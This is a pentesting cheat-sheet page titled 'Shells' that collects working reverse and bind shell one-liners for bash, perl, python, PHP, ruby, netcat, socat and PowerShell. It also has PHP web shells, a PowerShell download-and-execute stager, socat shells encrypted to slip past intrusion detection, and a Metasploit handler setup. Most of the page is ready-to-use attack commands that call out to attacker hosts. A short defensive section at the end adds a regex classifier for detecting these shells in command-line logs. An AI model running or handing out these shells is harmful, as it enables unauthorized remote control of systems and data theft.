HackBook.io
  • Pentesting Pocket Book for hackers and developers.
Shells


Last updated 3 years ago


Simple Shells:

BASH
bash -i >& /dev/tcp/192.168.19.29/1234 0>&1
// can put these in .sh files also and run them if you are trying to do local injects

PERL
perl -e 'use Socket;$i="192.168.19.29";$p=8385;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PYTHON
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.64.10",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

// send the shell file and run it
c:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.20:8888/myshell.ps1')

PHP
php -r '$sock=fsockopen("127.0.0.1",5555);exec("/bin/sh -i <&3 >&3 2>&3");'

RUBY
ruby -rsocket -e'f=TCPSocket.open("192.168.19.29",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

NETCAT reverse shell
attacker: nc -nlvp 4444
victim: nc -nv <ip> 4444 -e /bin/bash   // or cmd.exe
// no -e flag? then:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.90.60.80 7777 >/tmp/f

JAVA (Groovy syntax, as used in a script console)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.5/7888;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Reverse Shells (hacktricks)

Bash shell
bash -i >& /dev/tcp/10.90.60.80/8888 0>&1
// this one was to feed it into systemctl
gtfobin:
echo 'bash -c "bash -i >& /dev/tcp/192.168.19.27/12345 0>&1"' > shell.sh

Netcat without -e flag
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.64.10 59919 >/tmp/f

Netcat Linux
nc -e /bin/bash 172.16.64.10 59919

Netcat Windows
nc -e cmd.exe 192.168.19.26 12345

Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.23",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Perl
perl -e 'use Socket;$i="192.168.19.29";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Remote Desktop
// Remote Desktop to Windows with a share mapped and an 85% screen
rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.10.10.10

PHP
PHP command injection from a GET request. Navigate to the page with ?cmd=whoami; if it works (check in Burp also), plant a shell command:
<?php echo system($_GET["cmd"]);?>
Alternatives:
<?php echo shell_exec($_GET["cmd"]);?>
<?php system($_REQUEST['cmd']);?>
<?php $output = shell_exec($_GET["cmd"]); echo "<pre>$output</pre>"; ?>

Powershell
// Non-interactive execution of a PowerShell file
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1
PowerShell can also run payloads while the shell connection is made:
PS> powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1
# nc -lvnp 443
PS> ./reverseshell.ps1
// one-liner (the TCPClient object must be assigned to $client, otherwise $client.GetStream() is null):
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("10.10.14.20",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.19.26',7777);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Misc
More binaries on the PATH:
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/ucb/
// more PS
// Test PowerShell:
>powershell whoami   // should run the command if we have PowerShell
// we have ps1 shells in /usr/share/nishang/Shells/
// a good one to use for upgrading to a tty is:
Invoke-PowerShellTcp.ps1

nc

NetCat bind and reverse shells do not use encryption, nor do they limit which hosts may connect to the port.

// Check a specific port and display its banner (-n: no DNS, -v: verbose)
#nc -nv 10.11.25.2 25
// In this case we see an SMTP server sitting here and we can communicate with the SMTP service. We first type HELP and see a list of recognized SMTP commands that we can send, along with the account name that we are under.

// Listener + connection pair
Listen: #nc -nlvp 4444
Connect: #nc -nv <ip> 4444
// This sets up a raw connection where we can send text through, much like a chat screen.

// File transfers
// transfer the wget executable
#locate wget.exe   // gives us "/usr/share/windows-binaries/wget.exe"
Listen: #nc -nlvp 4444 > incoming.exe
Connect: #nc -nv <ip> 4444 < /usr/share/windows-binaries/wget.exe
// Note that we may not see the file transfer in the shell, but we should check the directory after a few seconds/minutes to see if it is there.
#nc <ip> 4444 < myfile.txt
// Output the nc stream to a file:
#nc <ip> 4444 > myfile.txt

// Command execution
// BIND shell: typically won't work through firewalls, as incoming sessions are stopped
// victim: #nc -nlvp 4444 -e cmd.exe   // attaches stdin/out/err of cmd to the connection for use
// attacker: #nc -nv <ip> 4444
// Reverse shell: safer because we are not binding a shell to a port; instead we let commands come into the port and then push them through to the shell.
// attacker: #nc -lvp 4444
// victim sends out the session: #nc -vn <ip> 4444 -e /bin/bash

PORT SCAN:
#nc -nvv -w 1 -z 10.10.10.10 3388-3390
// -w is the timeout in seconds, -z specifies zero data sending (connect scan only)
// UDP flag -u:
nc -nv -u -z -w 1 10.11.1.115 160-162

ncat

Typical NetCat bind and reverse shells do not use encryption, nor do they limit which hosts may connect to the port; Ncat does. Encryption can help avoid triggering an IDS/IPS, and connection limiters can help prevent data leakage during a pentest, since an unrestricted listener opens up the company network to anyone who finds it. Ncat (note: this is not nc) has some of this functionality.

// Set up an Ncat shell with a whitelist and encryption (pg. 65)
// listener:
#ncat -lvp 4444 -e cmd.exe --allow <ip> --ssl
// feeds input into cmd and only allows connections from the specified IPs
// connection:
#ncat -v <ip> 4444 --ssl

socat

CONNECTION:
Connector: #socat - TCP4:10.10.10.10:443
Listener: #socat TCP4-LISTEN:443 STDOUT

SENDING FILES:
Linux sender: #socat TCP4-LISTEN:443,fork file:secret_passwords.txt
Windows receiver: #socat TCP4:10.11.0.4:443 file:received_secret_passwords.txt,create

R-SHELL:
Win listen (attacker): #socat -d -d TCP4-LISTEN:443 STDOUT   // -d -d increases verbosity
Linux reaches out and provides the shell (vic): #socat TCP4:10.11.0.22:443 EXEC:/bin/bash

ENCRYPTED BIND SHELL: (helps evade IDS/IPS)
--- Making a self-signed cert:
#openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
// req and x509: create the self-signed cert
// -newkey: make a new private key
// rsa:2048: RSA key with a 2048-bit length
// -nodes: store the private key unencrypted
// -keyout bind_shell.key: save the key to this file
// -days 362: length of validity (days)
// -out bind_shell.crt: save the cert to this file
You will then be prompted for things like location and organization after hitting enter.
---- Combine the key and cert into PEM format, which can be used more widely:
#cat bind_shell.key bind_shell.crt > bind_shell.pem
Listener: #socat OPENSSL-LISTEN:433,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
// OPENSSL-LISTEN:433: listen on port 433 (the connector below must use the same port)
// cert=bind_shell.pem: cert file
// verify=0: turn off SSL peer verification
// fork EXEC:/bin/bash: fork a child process running bash for each connection
Connect: #socat - OPENSSL:10.10.10.10:433,verify=0

MSF

How to set up a multi/handler without using an exploit:
#msfconsole
>use exploit/multi/handler
>set lhost tun0
>set lport 1337
>set payload windows/meterpreter/reverse_tcp
>run -j
Troubleshoot: Sometimes you might get a restricted shell with things like BOFs, so you will want to switch into another process: run #ps, then 'migrate' to the PID.

Powershell

Do first:

Set-ExecutionPolicy Unrestricted

Get-ExecutionPolicy

R_SHELL:
Win connect:
>powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Kali listener: sudo nc -lnvp 443

BIND-SHELL:
Win listener:
> powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
// Kali connector: $ nc -nv 10.11.0.22 443
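The one-liners collected in the Simple Shells list and in the nc, socat and PowerShell sections above are also the best test input a blue team has for its own detection rules. The script below is an added example, not code from HackBook.io or from hacktricks: a hypothetical command-line classifier with one structural rule per shell family on this page (bash /dev/tcp, mkfifo piped into nc, nc -e, socat EXEC:, python socket+dup2, perl Socket+exec, php fsockopen+exec, PowerShell TcpClient+iex and IEX(New-Object Net.WebClient)). It assumes command lines have already been pulled out of auditd EXECVE records, Sysmon Event ID 1 or PowerShell script-block logs; the sample lines are constructed, using 10.0.0.1 as a placeholder address, and the last four are benign admin commands that share keywords with the shells and must not be flagged.

```python
"""Flag reverse/bind-shell one-liners in recorded process command lines.

Added example for this page; not HackBook.io or hacktricks code. It assumes
command lines were already extracted from auditd EXECVE records, Sysmon
Event ID 1, or PowerShell script-block logs (collection is out of scope here).
"""
import re
from dataclasses import dataclass

# One rule per shell family catalogued on this page. Patterns are deliberately
# structural (socket + exec, fifo + nc, TcpClient + iex) so that the IP, port
# and binary name can change without the rule going blind.
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/(tcp|udp)/[\w.-]+/\d+")),
    ("mkfifo_nc_pipe", re.compile(r"mkfifo\s+\S+.*\|\s*(nc|ncat|netcat)\b")),
    ("nc_exec_flag", re.compile(r"\b(nc|ncat|netcat)\b[^|]*\s-e\s+\S*(sh|bash|cmd\.exe)\b")),
    ("socat_exec", re.compile(r"\bsocat\b.*\bEXEC:", re.I)),
    ("python_socket_dup2", re.compile(r"socket\.socket\(.*dup2\(", re.S)),
    ("perl_socket_exec", re.compile(r"use Socket;.*\bexec\(", re.S)),
    ("php_fsockopen_exec", re.compile(r"fsockopen\(.*\b(exec|system|shell_exec)\(", re.S)),
    ("powershell_tcp_iex", re.compile(r"TcpClient\(.*GetStream\(\).*\biex\b", re.I | re.S)),
    ("powershell_download_iex", re.compile(r"\bIEX\s*\(?\s*New-Object\s+(System\.)?Net\.WebClient", re.I)),
]


@dataclass(frozen=True)
class Finding:
    line_no: int     # 1-based index into the scanned input
    rules: tuple     # names of every rule that matched
    cmdline: str


def classify(cmdline: str) -> list:
    """Return the names of all rules matching one command line (empty if benign)."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(cmdlines) -> list:
    """Run classify() over an iterable of command lines and keep only the hits."""
    findings = []
    for n, line in enumerate(cmdlines, 1):
        hits = classify(line)
        if hits:
            findings.append(Finding(n, tuple(hits), line))
    return findings


# Constructed sample input (not real log data): lines 1-8 paraphrase one-liners
# from this page with the placeholder address 10.0.0.1; lines 9-12 are benign
# admin commands that share keywords with the shells and must NOT be flagged.
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f",
    "nc -nv 10.0.0.1 4444 -e /bin/bash",
    "socat TCP4:10.0.0.1:443 EXEC:/bin/bash",
    "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect((\"10.0.0.1\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
    "subprocess.call([\"/bin/sh\",\"-i\"])'",
    "php -r '$sock=fsockopen(\"10.0.0.1\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',443);"
    "$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)\"",
    "powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.0.0.1:8888/stage.ps1')",
    "nc -zv db.internal 5432",
    "socat TCP4-LISTEN:8443,fork TCP4:127.0.0.1:8080",
    "python3 -c 'import socket; print(socket.gethostname())'",
    "bash -c 'tar czf /backup/www.tgz /var/www'",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"line {f.line_no}: {', '.join(f.rules)} :: {f.cmdline[:60]}")
```

The rules key on the combination that makes a shell a shell (a socket plus an exec, a fifo plus nc, a TcpClient plus iex) rather than on addresses or ports, so changing the IP in any line above does not dodge them; the benign nc port check, the socat relay and the hostname lookup pass cleanly because they lack the second half of the pair. Plain nc -e still slips past if the binary is renamed, which is why process-ancestry and outbound-connection telemetry are needed alongside command-line matching.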

https://book.hacktricks.xyz/shells/shells/